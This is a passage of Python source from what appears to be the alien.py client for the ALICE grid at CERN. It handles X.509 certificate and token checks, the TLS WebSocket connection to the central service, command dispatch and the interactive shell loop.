store_ctx.verify_certificate()
return RET(0, f'SSL Verification {PrintColor(COLORS.BIGreen)}succesful{PrintColor(COLORS.ColorReset)} for {fname}')
except Exception:
logging.debug(traceback.format_exc())
return RET(1, '', f'SSL Verification {PrintColor(COLORS.BIRed)}failed{PrintColor(COLORS.ColorReset)} for {fname}')
def DO_certverify(args: Union[list, None] = None) -> RET:
if args is None: args = []
cert, key = get_files_cert()
if len(args) > 0 and is_help(args): return RET(0, "Verify the user cert against the found CA stores (file or directory)", "")
return CertVerify(cert)
def DO_tokenverify(args: Union[list, None] = None) -> RET:
if not args: args = []
if len(args) > 0 and is_help(args): return RET(0, "Print token certificate information", "")
tokencert, tokenkey = get_token_filenames()
return CertVerify(tokencert)
def CertKeyMatch(cert_fname: str, key_fname: str) -> RET:
"""Check if Certificate and key match"""
try:
with open(cert_fname) as f: cert_bytes = f.read()
x509cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_bytes)
except Exception:
logging.debug(traceback.format_exc())
return RET(5, "", f'Could not load certificate >>>{cert_fname}<<<') # EIO /* I/O error */
try:
with open(key_fname) as g: key_bytes = g.read()
x509key = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, key_bytes)
except Exception:
logging.debug(traceback.format_exc())
return RET(5, "", f'Could not load key >>>{key_fname}<<<') # EIO /* I/O error */
context = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
context.use_privatekey(x509key)
context.use_certificate(x509cert)
try:
context.check_privatekey()
return RET(0, f'Cert/key {PrintColor(COLORS.BIGreen)}match{PrintColor(COLORS.ColorReset)}')
except OpenSSL.SSL.Error:
return RET(0, '', f'Cert/key {PrintColor(COLORS.BIRed)}DO NOT match{PrintColor(COLORS.ColorReset)}')
def DO_certkeymatch(args: Union[list, None] = None) -> RET:
if args is None: args = []
cert, key = get_files_cert()
if len(args) > 0 and is_help(args): return RET(0, "Check match of user cert with key cert", "")
return CertKeyMatch(cert, key)
def DO_tokenkeymatch(args: Union[list, None] = None) -> RET:
if args is None: args = []
cert, key = get_token_filenames()
if len(args) > 0 and is_help(args): return RET(0, "Check match of user token with key token", "")
return CertKeyMatch(cert, key)
def get_ca_path() -> str:
"""Return either the CA path or file; bailout application if not found"""
system_ca_path = '/etc/grid-security/certificates'
alice_cvmfs_ca_path_lx = '/cvmfs/alice.cern.ch/etc/grid-security/certificates'
alice_cvmfs_ca_path_macos = f'/Users/Shared{alice_cvmfs_ca_path_lx}'
x509file = os.getenv('X509_CERT_FILE') if os.path.isfile(str(os.getenv('X509_CERT_FILE'))) else ''
if x509file:
if _DEBUG: logging.debug(f'X509_CERT_FILE = {x509file}')
return x509file
x509dir = os.getenv('X509_CERT_DIR') if os.path.isdir(str(os.getenv('X509_CERT_DIR'))) else ''
if x509dir:
if _DEBUG: logging.debug(f'X509_CERT_DIR = {x509dir}')
return x509dir
capath_default = None
if os.path.exists(alice_cvmfs_ca_path_lx):
capath_default = alice_cvmfs_ca_path_lx
elif os.path.exists(alice_cvmfs_ca_path_macos):
capath_default = alice_cvmfs_ca_path_macos
else:
if os.path.exists(system_ca_path): capath_default = system_ca_path
if not capath_default:
msg = "No CA location or files specified or found!!! Connection will not be possible!!"
print_err(msg)
logging.info(msg)
sys.exit(2)
if _DEBUG: logging.debug(f'CApath = {capath_default}')
return capath_default
def get_token_filenames() -> tuple:
"""Get the token filenames, including the temporary ones used as env variables"""
global AlienSessionInfo
tokencert, tokenkey = get_token_names()
random_str = None
if not os.path.isfile(tokencert) and tokencert.startswith('-----BEGIN CERTIFICATE-----'): # and is not a file
random_str = str(uuid.uuid4())
temp_cert = tempfile.NamedTemporaryFile(prefix = 'tokencert_', suffix = f'_{str(os.getuid())}_{random_str}.pem', delete = False)
temp_cert.write(tokencert.encode(encoding="ascii", errors="replace"))
temp_cert.seek(0)
tokencert = temp_cert.name # temp file was created, let's give the filename to tokencert
AlienSessionInfo['templist'].append(tokencert)
if not os.path.isfile(tokenkey) and tokenkey.startswith('-----BEGIN RSA PRIVATE KEY-----'): # and is not a file
if random_str is None: random_str = str(uuid.uuid4())
temp_key = tempfile.NamedTemporaryFile(prefix = 'tokenkey_', suffix = f'_{str(os.getuid())}_{random_str}.pem', delete = False)
temp_key.write(tokenkey.encode(encoding="ascii", errors="replace"))
temp_key.seek(0)
tokenkey = temp_key.name # temp file was created, let's give the filename to tokenkey
AlienSessionInfo['templist'].append(tokenkey)
return (tokencert, tokenkey) if (IsValidCert(tokencert) and os.path.isfile(tokenkey)) else (None, None)
def create_ssl_context(use_usercert: bool = False) -> ssl.SSLContext:
"""Create SSL context using either the default names for user certificate and token certificate or X509_USER_{CERT,KEY} JALIEN_TOKEN_{CERT,KEY} environment variables"""
global AlienSessionInfo
# SSL SETTINGS
cert = key = None # vars for discovered credentials
usercert, userkey = get_files_cert()
tokencert, tokenkey = get_token_filenames()
if not use_usercert and tokencert and tokenkey:
cert, key = tokencert, tokenkey
AlienSessionInfo['use_usercert'] = False
else:
if not (os.path.exists(usercert) and os.path.exists(userkey)):
msg = "User certificate files NOT FOUND!!! Connection will not be possible!!"
print_err(msg)
logging.info(msg)
sys.exit(126)
cert, key = usercert, userkey
if not IsValidCert(cert):
msg = f'Invalid user certificate!! Check the content of {cert}'
print_err(msg)
logging.info(msg)
sys.exit(129)
AlienSessionInfo['use_usercert'] = True
if _DEBUG: logging.debug(f"Cert = {cert}; Key = {key}; Creating SSL context .. ")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# try:
# ctx.set_ciphers('DEFAULT@SECLEVEL=1') # Server uses only 80bit (sigh); set SECLEVEL only for newer than EL7
# except ssl.SSLError:
# pass
ctx.options |= ssl.OP_NO_SSLv3
ctx.verify_mode = ssl.CERT_REQUIRED # CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED
ctx.check_hostname = False
if _DEBUG: logging.debug("SSL context:: Load verify locations")
ca_verify_location = get_ca_path()
if os.path.isfile(ca_verify_location):
ctx.load_verify_locations(cafile = ca_verify_location)
else:
ctx.load_verify_locations(capath = ca_verify_location)
if _DEBUG: logging.debug("SSL context:: Load certificate chain (cert/key)")
ctx.load_cert_chain(certfile=cert, keyfile=key)
if _DEBUG: logging.debug("SSL context done.")
return ctx
@syncify
async def wb_create(host: str = 'localhost', port: Union[str, int] = '0', path: str = '/', use_usercert: bool = False, localConnect: bool = False):
"""Create a websocket to wss://host:port/path (it is implied a SSL context)"""
QUEUE_SIZE = int(128) # maximum length of the queue that holds incoming messages
MSG_SIZE = None # int(20 * 1024 * 1024) # maximum size for incoming messages in bytes. The default value is 1 MiB. None disables the limit
PING_TIMEOUT = int(os.getenv('ALIENPY_TIMEOUT', '20')) # If the corresponding Pong frame isnโt received within ping_timeout seconds, the connection is considered unusable and is closed
PING_INTERVAL = PING_TIMEOUT # Ping frame is sent every ping_interval seconds
CLOSE_TIMEOUT = int(10) # maximum wait time in seconds for completing the closing handshake and terminating the TCP connection
# https://websockets.readthedocs.io/en/stable/api.html#websockets.protocol.WebSocketCommonProtocol
# we use some conservative values, higher than this might hurt the sensitivity to intreruptions
wb = None
ctx = None
# client_max_window_bits = 12, # tomcat endpoint does not allow anything other than 15, so let's just choose a mem default towards speed
deflateFact = _wb_permessage_deflate.ClientPerMessageDeflateFactory(compress_settings={'memLevel': 4},)
headers_list = []
headers_list.append(('User-Agent', f'alien.py/{ALIENPY_VERSION_STR} websockets/{websockets.__version__}'))
if localConnect:
fHostWSUrl = 'ws://localhost/'
logging.info(f"Request connection to : {fHostWSUrl}")
socket_filename = f'{_TMPDIR}/jboxpy_{str(os.getuid())}.sock'
try:
wb = await websockets.unix_connect(socket_filename, fHostWSUrl,
max_queue=QUEUE_SIZE,
max_size=MSG_SIZE,
ping_interval=PING_INTERVAL,
ping_timeout=PING_TIMEOUT,
close_timeout=CLOSE_TIMEOUT,
extra_headers=headers_list
)
except Exception as e:
msg = 'Could NOT establish connection (local socket) to {0}\n{1}'.format(socket_filename, e)
logging.error(msg)
print_err(f'{msg}\nCheck the logfile: {_DEBUG_FILE}')
return None
else:
fHostWSUrl = f'wss://{host}:{port}{path}' # conection url
ctx = create_ssl_context(use_usercert) # will check validity of token and if invalid cert will be usercert
logging.info(f"Request connection to : {host}:{port}{path}")
socket_endpoint = None
# https://async-stagger.readthedocs.io/en/latest/reference.html#async_stagger.create_connected_sock
# AI_* flags --> https://linux.die.net/man/3/getaddrinfo
try:
if _DEBUG:
logging.debug(f"TRY ENDPOINT: {host}:{port}")
init_begin = datetime.datetime.now().timestamp()
if os.getenv('ALIENPY_NO_STAGGER'):
socket_endpoint = socket.create_connection((host, int(port)))
else:
socket_endpoint = await async_stagger.create_connected_sock(host, int(port), async_dns=True, resolution_delay=0.050, detailed_exceptions=True)
if _DEBUG:
init_delta = (datetime.datetime.now().timestamp() - init_begin) * 1000
logging.debug(f"TCP SOCKET DELTA: {init_delta:.3f} ms")
except Exception as e:
msg = 'Could NOT establish connection (TCP socket) to {0}:{1}\n{2}'.format(host, port, e)
logging.error(msg)
print_err(f'{msg}\nCheck the logfile: {_DEBUG_FILE}')
return None
if socket_endpoint:
socket_endpoint_addr = socket_endpoint.getpeername()[0]
socket_endpoint_port = socket_endpoint.getpeername()[1]
logging.info(f"GOT SOCKET TO: {socket_endpoint_addr}")
try:
if _DEBUG: init_begin = datetime.datetime.now().timestamp()
wb = await websockets.connect(fHostWSUrl, sock = socket_endpoint, server_hostname = host, ssl = ctx,
extensions=[deflateFact, ],
max_queue=QUEUE_SIZE,
max_size=MSG_SIZE,
ping_interval=PING_INTERVAL,
ping_timeout=PING_TIMEOUT,
close_timeout=CLOSE_TIMEOUT,
extra_headers=headers_list
)
if _DEBUG:
init_delta = (datetime.datetime.now().timestamp() - init_begin) * 1000
logging.debug(f"WEBSOCKET DELTA: {init_delta:.3f} ms")
except Exception as e:
msg = 'Could NOT establish connection (WebSocket) to {0}:{1}\n{2}'.format(socket_endpoint_addr, socket_endpoint_port, e)
logging.error(msg)
print_err(f'{msg}\nCheck the logfile: {_DEBUG_FILE}')
return None
if wb: logging.info(f"CONNECTED: {wb.remote_address[0]}:{wb.remote_address[1]}")
return wb
def wb_create_tryout(host: str = 'localhost', port: Union[str, int] = '0', path: str = '/', use_usercert: bool = False, localConnect: bool = False):
"""WebSocket creation with tryouts (configurable by env ALIENPY_CONNECT_TRIES and ALIENPY_CONNECT_TRIES_INTERVAL)"""
wb = None
nr_tries = 0
init_begin = init_delta = None
if _TIME_CONNECT or _DEBUG: init_begin = datetime.datetime.now().timestamp()
connect_tries = int(os.getenv('ALIENPY_CONNECT_TRIES', '3'))
connect_tries_interval = float(os.getenv('ALIENPY_CONNECT_TRIES_INTERVAL', '0.5'))
while wb is None:
try:
nr_tries += 1
wb = wb_create(host, str(port), path, use_usercert, localConnect)
except Exception as e:
logging.error('{0}'.format(e))
if not wb:
if nr_tries >= connect_tries:
logging.error(f"We tried on {host}:{port}{path} {nr_tries} times")
break
time.sleep(connect_tries_interval)
if wb and init_begin:
init_delta = (datetime.datetime.now().timestamp() - init_begin) * 1000
msg = f'>>> Endpoint total connecting time: {init_delta:.3f} ms'
if _DEBUG: logging.debug(msg)
if _TIME_CONNECT: print_out(msg)
if wb and localConnect:
pid_filename = f'{_TMPDIR}/jboxpy_{os.getuid()}.pid'
writePidFile(pid_filename)
return wb
def AlienConnect(token_args: Union[None, list] = None, use_usercert: bool = False, localConnect: bool = False):
"""Create a websocket connection to AliEn services either directly to alice-jcentral.cern.ch or trough a local found jbox instance"""
jalien_server = os.getenv("ALIENPY_JCENTRAL", 'alice-jcentral.cern.ch') # default value for JCENTRAL
jalien_websocket_port = os.getenv("ALIENPY_JCENTRAL_PORT", '8097') # websocket port
jalien_websocket_path = '/websocket/json'
jclient_env = f'{_TMPDIR}/jclient_token_{str(os.getuid())}'
# let's try to get a websocket
wb = None
if localConnect:
wb = wb_create(localConnect = True)
else:
if not os.getenv("ALIENPY_JCENTRAL") and os.path.exists(jclient_env): # If user defined ALIENPY_JCENTRAL the intent is to set and use the endpoint
# lets check JBOX availability
jalien_info = read_conf_file(jclient_env)
if jalien_info:
if is_my_pid(jalien_info['JALIEN_PID']) and isReachable(jalien_info['JALIEN_HOST'], jalien_info['JALIEN_WSPORT']):
jalien_server, jalien_websocket_port = jalien_info['JALIEN_HOST'], jalien_info['JALIEN_WSPORT']
wb = wb_create_tryout(jalien_server, str(jalien_websocket_port), jalien_websocket_path, use_usercert)
# if we stil do not have a socket, then try to fallback to jcentral if we did not had explicit endpoint and jcentral was not already tried
if wb is None and not os.getenv("ALIENPY_JCENTRAL") and jalien_server != 'alice-jcentral.cern.ch':
jalien_server, jalien_websocket_port = 'alice-jcentral.cern.ch', '8097'
wb = wb_create_tryout(jalien_server, str(jalien_websocket_port), jalien_websocket_path, use_usercert)
if wb is None:
msg = f'Check the logfile: {_DEBUG_FILE}\nCould not get a websocket connection to {jalien_server}:{jalien_websocket_port}'
logging.error(msg)
print_err(msg)
sys.exit(1)
__SESSION_WB = wb # Save the connection as a global variable
if AlienSessionInfo['use_usercert']: token(wb, token_args) # if we connect with usercert then let get a default token
return wb
def make_func_map_clean_server():
"""Remove from server list the client-side re-implementations"""
global AlienSessionInfo
del AlienSessionInfo['cmd2func_map_srv']['cd']
list_remove_item(AlienSessionInfo['commandlist'], 'cd')
del AlienSessionInfo['cmd2func_map_srv']['cp']
list_remove_item(AlienSessionInfo['commandlist'], 'cp')
del AlienSessionInfo['cmd2func_map_srv']['ping']
list_remove_item(AlienSessionInfo['commandlist'], 'ping')
del AlienSessionInfo['cmd2func_map_srv']['ps']
list_remove_item(AlienSessionInfo['commandlist'], 'ps')
del AlienSessionInfo['cmd2func_map_srv']['submit']
list_remove_item(AlienSessionInfo['commandlist'], 'submit')
del AlienSessionInfo['cmd2func_map_srv']['token']
list_remove_item(AlienSessionInfo['commandlist'], 'token')
del AlienSessionInfo['cmd2func_map_srv']['user']
list_remove_item(AlienSessionInfo['commandlist'], 'user')
del AlienSessionInfo['cmd2func_map_srv']['cat']
list_remove_item(AlienSessionInfo['commandlist'], 'cat')
del AlienSessionInfo['cmd2func_map_srv']['toXml']
list_remove_item(AlienSessionInfo['commandlist'], 'toXml')
def make_func_map_nowb():
'''client side functions (new commands) that do not require connection to jcentral'''
global AlienSessionInfo
if AlienSessionInfo['cmd2func_map_nowb']: return
AlienSessionInfo['cmd2func_map_nowb']['prompt'] = DO_prompt
AlienSessionInfo['cmd2func_map_nowb']['token-info'] = DO_tokeninfo
AlienSessionInfo['cmd2func_map_nowb']['token-verify'] = DO_tokenverify
AlienSessionInfo['cmd2func_map_nowb']['token-destroy'] = DO_tokendestroy
AlienSessionInfo['cmd2func_map_nowb']['cert-info'] = DO_certinfo
AlienSessionInfo['cmd2func_map_nowb']['cert-verify'] = DO_certverify
AlienSessionInfo['cmd2func_map_nowb']['certkey-match'] = DO_certkeymatch
AlienSessionInfo['cmd2func_map_nowb']['tokenkey-match'] = DO_tokenkeymatch
AlienSessionInfo['cmd2func_map_nowb']['exitcode'] = exitcode
AlienSessionInfo['cmd2func_map_nowb']['$?'] = exitcode
AlienSessionInfo['cmd2func_map_nowb']['version'] = DO_version
AlienSessionInfo['cmd2func_map_nowb']['pfn-status'] = DO_pfnstatus
AlienSessionInfo['cmd2func_map_nowb']['queryML'] = DO_queryML
AlienSessionInfo['cmd2func_map_nowb']['exit'] = DO_exit
AlienSessionInfo['cmd2func_map_nowb']['quit'] = DO_exit
AlienSessionInfo['cmd2func_map_nowb']['logout'] = DO_exit
AlienSessionInfo['cmd2func_map_nowb']['checkAddr'] = DO_checkAddr
make_func_map_nowb() # GLOBAL!! add to the list of client-side no-connection implementations
def make_func_map_client():
'''client side functions (new commands) that DO require connection to jcentral'''
global AlienSessionInfo
if AlienSessionInfo['cmd2func_map_client']: return
# client side function (overrides) with signature : (wb, args, opts)
AlienSessionInfo['cmd2func_map_client']['cd'] = cd
AlienSessionInfo['cmd2func_map_client']['cp'] = DO_XrootdCp
AlienSessionInfo['cmd2func_map_client']['ping'] = DO_ping
AlienSessionInfo['cmd2func_map_client']['ps'] = DO_ps
AlienSessionInfo['cmd2func_map_client']['submit'] = DO_submit
AlienSessionInfo['cmd2func_map_client']['token'] = DO_token
AlienSessionInfo['cmd2func_map_client']['user'] = DO_user
AlienSessionInfo['cmd2func_map_client']['cat'] = DO_cat
AlienSessionInfo['cmd2func_map_client']['toXml'] = DO_2xml
# client side function (new commands) with signature : (wb, args)
AlienSessionInfo['cmd2func_map_client']['quota'] = DO_quota
AlienSessionInfo['cmd2func_map_client']['token-init'] = DO_token_init
AlienSessionInfo['cmd2func_map_client']['pfn'] = DO_pfn
AlienSessionInfo['cmd2func_map_client']['run'] = DO_run
AlienSessionInfo['cmd2func_map_client']['exec'] = DO_exec
AlienSessionInfo['cmd2func_map_client']['getSE'] = DO_getSE
AlienSessionInfo['cmd2func_map_client']['find2'] = DO_find2
AlienSessionInfo['cmd2func_map_client']['dirs'] = DO_dirs
AlienSessionInfo['cmd2func_map_client']['popd'] = DO_popd
AlienSessionInfo['cmd2func_map_client']['pushd'] = DO_pushd
AlienSessionInfo['cmd2func_map_client']['help'] = DO_help
AlienSessionInfo['cmd2func_map_client']['?'] = DO_help
AlienSessionInfo['cmd2func_map_client']['edit'] = DO_edit
AlienSessionInfo['cmd2func_map_client']['mcedit'] = DO_mcedit
AlienSessionInfo['cmd2func_map_client']['nano'] = DO_nano
AlienSessionInfo['cmd2func_map_client']['vi'] = DO_vi
AlienSessionInfo['cmd2func_map_client']['vim'] = DO_vim
AlienSessionInfo['cmd2func_map_client']['SEqos'] = DO_SEqos
AlienSessionInfo['cmd2func_map_client']['less'] = DO_less
AlienSessionInfo['cmd2func_map_client']['more'] = DO_more
AlienSessionInfo['cmd2func_map_client']['lfn2uri'] = DO_lfn2uri
make_func_map_client() # GLOBAL!! add to cmd2func_map_client the list of client-side implementations
def getSessionVars(wb):
"""Initialize the global session variables : cleaned up command list, user, home dir, current dir"""
global AlienSessionInfo
if AlienSessionInfo['user']: return # user session variable is already set, then return
if not wb: return
# get the command list just once per session connection (a reconnection will skip this)
ret_obj = SendMsg(wb, 'commandlist', [])
# first executed commands, let's initialize the following (will re-read at each ProcessReceivedMessage)
if not ret_obj.ansdict or 'results' not in ret_obj.ansdict:
print_err('Start session:: could not get command list, let\'s exit.')
sys.exit(1)
regex = re.compile(r'.*_csd$')
AlienSessionInfo['commandlist'] = [cmd["commandlist"] for cmd in ret_obj.ansdict["results"] if not regex.match(cmd["commandlist"])]
AlienSessionInfo['commandlist'].remove('jquota')
AlienSessionInfo['commandlist'].remove('fquota')
# server commands, signature is : (wb, command, args, opts)
for cmd in AlienSessionInfo['commandlist']: AlienSessionInfo['cmd2func_map_srv'][cmd] = SendMsg
make_func_map_clean_server()
# these are aliases, or directly interpreted
AlienSessionInfo['commandlist'].append('ll')
AlienSessionInfo['commandlist'].append('la')
AlienSessionInfo['commandlist'].append('lla')
AlienSessionInfo['commandlist'].extend(AlienSessionInfo['cmd2func_map_client']) # add clien-side cmds to list
AlienSessionInfo['commandlist'].extend(AlienSessionInfo['cmd2func_map_nowb']) # add nowb cmds to list
# AlienSessionInfo['commandlist'].sort()
AlienSessionInfo['commandlist'] = sorted(set(AlienSessionInfo['commandlist']))
# when starting new session prevdir is empty, if set then this is a reconnection
if AlienSessionInfo['prevdir'] and (AlienSessionInfo['prevdir'] != AlienSessionInfo['currentdir']): cd(wb, AlienSessionInfo['prevdir'], 'log')
def InitConnection(token_args: Union[None, list] = None, use_usercert: bool = False, localConnect: bool = False):
"""Create a session to AliEn services, including session globals"""
global AlienSessionInfo
init_begin = init_delta = None
if _TIME_CONNECT or _DEBUG: init_begin = datetime.datetime.now().timestamp()
wb = AlienConnect(token_args, use_usercert, localConnect)
if init_begin:
init_delta = (datetime.datetime.now().timestamp() - init_begin) * 1000
msg = f">>> Time for websocket connection: {init_delta:.3f} ms"
if _DEBUG: logging.debug(msg)
if _TIME_CONNECT: print_out(msg)
if wb is not None: AlienSessionInfo['session_started'] = True
getSessionVars(wb) # no matter if command or interactive mode, we need alienHome, currentdir, user and commandlist
if init_begin:
init_delta = (datetime.datetime.now().timestamp() - init_begin) * 1000
msg = f">>> Time for session connection: {init_delta:.3f} ms"
if _DEBUG: logging.debug(msg)
if _TIME_CONNECT: print_out(msg)
return wb
def ProcessInput(wb, cmd: str, args: Union[list, None] = None, shellcmd: Union[str, None] = None) -> RET:
"""Process a command line within shell or from command line mode input"""
global AlienSessionInfo
if not cmd: return RET(1, '', 'ProcessInput:: Empty input')
if args is None: args = []
ret_obj = None
# early command aliases and default flags
if cmd == 'ls': args[0:0] = ['-F']
if cmd == 'll':
cmd = 'ls'
args[0:0] = ['-F', '-l']
if cmd == 'la':
cmd = 'ls'
args[0:0] = ['-F', '-a']
if cmd == 'lla':
cmd = 'ls'
args[0:0] = ['-F', '-l', '-a']
# implement a time command for measurement of sent/recv delay; for the commands above we do not use timing
time_begin = msg_timing = None
if cmd == 'time': # first to be processed is the time token, it will start the timing and be removed from command
if not args or is_help(args): return RET(0, 'Command format: time command arguments')
cmd = args.pop(0)
time_begin = datetime.datetime.now().timestamp()
if cmd in AlienSessionInfo['cmd2func_map_nowb']: # these commands do NOT need wb connection
ret_obj = AlienSessionInfo['cmd2func_map_nowb'][cmd](args)
return ret_obj
opts = '' # let's proccess special server args
if get_arg(args, '-nokeys'): opts = f'{opts} nokeys'
if get_arg(args, '-nomsg'): opts = f'{opts} nomsg'
if get_arg(args, '-showkeys'): opts = f'{opts} showkeys'
if get_arg(args, '-showmsg'): opts = f'{opts} showmsg'
# We will not check for websocket connection as: 1. there is keep alive mechanism 2. there is recovery in SendMsg
if cmd in AlienSessionInfo['cmd2func_map_client']: # lookup in clien-side implementations list
ret_obj = AlienSessionInfo['cmd2func_map_client'][cmd](wb, args)
elif cmd in AlienSessionInfo['cmd2func_map_srv']: # lookup in server-side list
ret_obj = AlienSessionInfo['cmd2func_map_srv'][cmd](wb, cmd, args, opts)
if ret_obj is None: return RET(1, '', f"NO RET OBJ!! The command was not found: {cmd} {chr(32).join(args)}")
if time_begin: msg_timing = f">>>ProcessInput time: {(datetime.datetime.now().timestamp() - time_begin) * 1000:.3f} ms"
if shellcmd:
if ret_obj.exitcode != 0: return ret_obj
if not ret_obj.out:
return RET(1, '', f'Command >>>{cmd} {chr(32).join(args)}<<< do not have output but exitcode == 0')
shell_run = subprocess.run(shellcmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, input=ret_obj.out, encoding='ascii', shell=True) # pylint: disable=subprocess-run-check # env=os.environ default is already the process env
if msg_timing: shell_run.stdout = f'{shell_run.stdout}\n{msg_timing}'
return RET(shell_run.returncode, shell_run.stdout, shell_run.stderr)
if msg_timing: ret_obj = ret_obj._replace(out = f'{ret_obj.out}\n{msg_timing}')
if ret_obj.ansdict and 'timing_ms' in ret_obj.ansdict['metadata']: ret_obj = ret_obj._replace(out = f"{ret_obj.out}\ntiming_ms = {ret_obj.ansdict['metadata']['timing_ms']}")
return ret_obj
def ProcessCommandChain(wb = None, cmd_chain: str = '') -> int:
global AlienSessionInfo, _JSON_OUT, _JSON_OUT_GLOBAL
if not cmd_chain: return int(1)
# translate aliases in place in the whole string
if AlienSessionInfo['alias_cache']:
for alias in AlienSessionInfo['alias_cache']: cmd_chain = cmd_chain.replace(alias, AlienSessionInfo['alias_cache'][alias])
cmdline_list = [str(cmd).strip() for cmd in cmds_split.split(cmd_chain)] # split commands on ; and \n
ret_obj = None
for cmdline in cmdline_list:
if not cmdline: continue
if _DEBUG: logging.info(f'>>> RUN COMMAND: {cmdline}')
if cmdline.startswith('!'): # if shell command, just run it and return
capture_out = True
if '-noout' in cmdline:
cmdline = cmdline.replace(' -noout', '')
capture_out = False
ret_obj = runShellCMD(cmdline, capture_out)
retf_print(ret_obj, 'debug')
continue
# process the input and take care of pipe to shell
input_alien, sep, pipe_to_shell_cmd = cmdline.partition('|')
if not input_alien:
print_out("AliEn command before the | token was not found")
continue
args = shlex.split(input_alien.strip())
cmd = args.pop(0)
_JSON_OUT = _JSON_OUT_GLOBAL # if globally enabled then enable per command
if get_arg(args, '-json'): _JSON_OUT = True # if enabled for this command
print_opts = 'debug json' if _JSON_OUT else 'debug'
if _JSON_OUT and 'json' not in print_opts: print_opts = f'{print_opts} {json}'
if cmd in AlienSessionInfo['cmd2func_map_nowb']:
ret_obj = AlienSessionInfo['cmd2func_map_nowb'][cmd](args)
else:
if wb is None: wb = InitConnection() # we are doing the connection recovery and exception treatment in AlienConnect()
args.insert(0, '-nokeys') # Disable return of the keys. ProcessCommandChain is used for user-based communication so json keys are not needed
ret_obj = ProcessInput(wb, cmd, args, pipe_to_shell_cmd)
retf_print(ret_obj, print_opts)
if cmd == 'cd': SessionSave()
_JSON_OUT = _JSON_OUT_GLOBAL # reset _JSON_OUT if it's not globally enabled (env var or argument to alien.py)
return ret_obj.exitcode
def JAlien(commands: str = '') -> int:
"""Main entry-point for interaction with AliEn"""
global AlienSessionInfo, _JSON_OUT
import_aliases()
wb = None
# Command mode interaction
if commands:
AlienSessionInfo['exitcode'] = ProcessCommandChain(wb, commands)
return AlienSessionInfo['exitcode']
# Start interactive mode
wb = InitConnection() # we are doing the connection recovery and exception treatment in AlienConnect()
# Begin Shell-like interaction
if _HAS_READLINE:
rl.parse_and_bind("tab: complete")
rl.set_completer_delims(" ")
def complete(text, state):
prompt_line = rl.get_line_buffer()
tokens = prompt_line.split()
results = []
if len(tokens) == 0:
results = [f'{x} ' for x in AlienSessionInfo['commandlist']]
elif len(tokens) == 1 and not prompt_line.endswith(' '):
results = [f'{x} ' for x in AlienSessionInfo['commandlist'] if x.startswith(text)] + [None]
else:
results = lfn_list(wb, text) + [None]
return results[state]
rl.set_completer(complete)
setupHistory() # enable history saving
print_out('Welcome to the ALICE GRID\nsupport mail: adrian.sevcenco@cern.ch\n')
if os.getenv('ALIENPY_PROMPT_DATE'): AlienSessionInfo['show_date'] = True
if os.getenv('ALIENPY_PROMPT_CWD'): AlienSessionInfo['show_lpwd'] = True
if not os.getenv('ALIENPY_NO_CWD_RESTORE'): SessionRestore(wb)
while True:
INPUT = None
prompt = f"AliEn[{AlienSessionInfo['user']}]:{AlienSessionInfo['currentdir']}"
if AlienSessionInfo['show_date']: prompt = f'{datetime.datetime.now().replace(microsecond=0).isoformat()} {prompt}'
if AlienSessionInfo['show_lpwd']: prompt = f'{prompt} local:{Path.cwd().as_posix()}'
prompt = f'{prompt} >'
try:
INPUT = input(prompt)
except EOFError:
exit_message()
if not INPUT: continue
AlienSessionInfo['exitcode'] = ProcessCommandChain(wb, INPUT)
return AlienSessionInfo['exitcode']
def setup_logging():
global _DEBUG_FILE
logging.addLevelName(90, 'STDOUT')
logging.addLevelName(95, 'STDERR')
MSG_LVL = logging.DEBUG if _DEBUG else logging.INFO
line_fmt = '%(levelname)s:%(asctime)s %(message)s'
file_mode = 'a' if os.getenv('ALIENPY_DEBUG_APPEND', '') else 'w'
try:
logging.basicConfig(format = line_fmt, filename = _DEBUG_FILE, filemode = file_mode, level = MSG_LVL)
except Exception:
print_err(f'Could not write the log file {_DEBUG_FILE}; falling back to /tmp')
_DEBUG_FILE = f'/tmp/{os.path.basename(_DEBUG_FILE)}'
pass
try:
logging.basicConfig(format = line_fmt, filename = _DEBUG_FILE, filemode = file_mode, level = MSG_LVL)
except Exception:
print_err(f'Could not write the log file {_DEBUG_FILE}')
logging.getLogger().setLevel(MSG_LVL)
logging.getLogger('websockets').setLevel(MSG_LVL)
# logging.getLogger('websockets.protocol').setLevel(MSG_LVL)
# logging.getLogger('websockets.client').setLevel(MSG_LVL)
if os.getenv('ALIENPY_DEBUG_CONCURENT'):
logging.getLogger('concurrent').setLevel(MSG_LVL)
logging.getLogger('concurrent.futures').setLevel(MSG_LVL)
if os.getenv('ALIENPY_DEBUG_ASYNCIO'):
logging.getLogger('asyncio').setLevel(MSG_LVL)
if os.getenv('ALIENPY_DEBUG_STAGGER'):
logging.getLogger('async_stagger').setLevel(MSG_LVL)
def main():
setup_logging()
signal.signal(signal.SIGINT, signal_handler)
# signal.signal(sig, signal.SIG_DFL) # register the default signal handler usage for a sig signal
global _JSON_OUT, _JSON_OUT_GLOBAL, ALIENPY_EXECUTABLE
# at exit delete all temporary files
atexit.register(cleanup_temp)
ALIENPY_EXECUTABLE = os.path.realpath(sys.argv.pop(0)) # remove the name of the script
_JSON_OUT_GLOBAL = _JSON_OUT = get_arg(sys.argv, '-json')
arg_list_expanded = []
for arg in sys.argv:
for item in shlex.split(arg):
arg_list_expanded.append(item)
sys.argv = arg_list_expanded
if _DEBUG:
ret_obj = DO_version()
logging.debug(f'{ret_obj.out}\n')
if len(sys.argv) > 0 and (sys.argv[0] == 'term' or sys.argv[0] == 'terminal' or sys.argv[0] == 'console'):
import code
term = code.InteractiveConsole(locals = globals())
term.push('jalien = AliEn()')
banner = 'Welcome to the ALICE GRID - Python interpreter shell\nsupport mail: adrian.sevcenco@cern.ch\nAliEn seesion object is >jalien< ; try jalien.help()'
exitmsg = 'Exiting..'
term.interact(banner, exitmsg)
sys.exit(int(AlienSessionInfo['exitcode'])) # pylint: disable=protected-access
exec_name = Path(ALIENPY_EXECUTABLE).name
verb = exec_name.replace('alien_', '') if exec_name.startswith('alien_') else ''
if verb: sys.argv.insert(0, verb)
cmd_string = ''
if len(sys.argv) > 0 and os.path.isfile(sys.argv[0]):
with open(sys.argv[0]) as input_file:
cmd_string = input_file.read()
else:
cmd_string = ' '.join(sys.argv)
try:
sys.exit(JAlien(cmd_string))
except KeyboardInterrupt as e:
